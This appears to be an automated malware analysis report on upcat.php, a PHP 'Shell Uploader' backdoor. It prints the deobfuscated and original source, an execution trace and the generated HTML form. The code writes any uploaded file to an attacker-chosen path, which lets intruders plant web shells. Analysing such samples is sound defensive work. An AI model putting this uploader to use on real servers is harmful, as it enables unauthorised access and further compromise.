PHP Malware Analysis
upcat.php
md5: 9803ca73b5545225dbfbfaf73a0856e4
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
Title
- Shell Uploader (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='{$fullpath}'>Click Me!</a></h1>";
}
}
echo "<html><head><title>Shell Uploader</title></head><body><form method=POST enctype=\"multipart/form-data\" action=\"\"><input type=hidden name=path><input type=\"file\" name=\"files\"><input type=submit value=\"Up\"></form></body></html>";Execution traces
data/traces/9803ca73b5545225dbfbfaf73a0856e4_trace-1676261776.0397.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:16:41.937542]
1 0 1 0.000150 393512
1 3 0 0.000210 395712 {main} 1 /var/www/html/uploads/upcat.php 0 0
1 A /var/www/html/uploads/upcat.php 1 $files = NULL
1 3 1 0.000245 395712
0.000271 314256
TRACE END [2023-02-13 02:16:41.937694]
Generated HTML code
<html><head><title>Shell Uploader</title></head><body><form method="POST" enctype="multipart/form-data" action=""><input type="hidden" name="path"><input type="file" name="files"><input type="submit" value="Up"></form></body></html>Original PHP code
<?php $files = @$_FILES["files"];if ($files["name"] != '') {$fullpath = $_REQUEST["path"] . $files["name"];if (move_uploaded_file($files['tmp_name'], $fullpath)) {echo "<h1><a href='$fullpath'>Click Me!</a></h1>";}}echo '<html><head><title>Shell Uploader</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=hidden name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>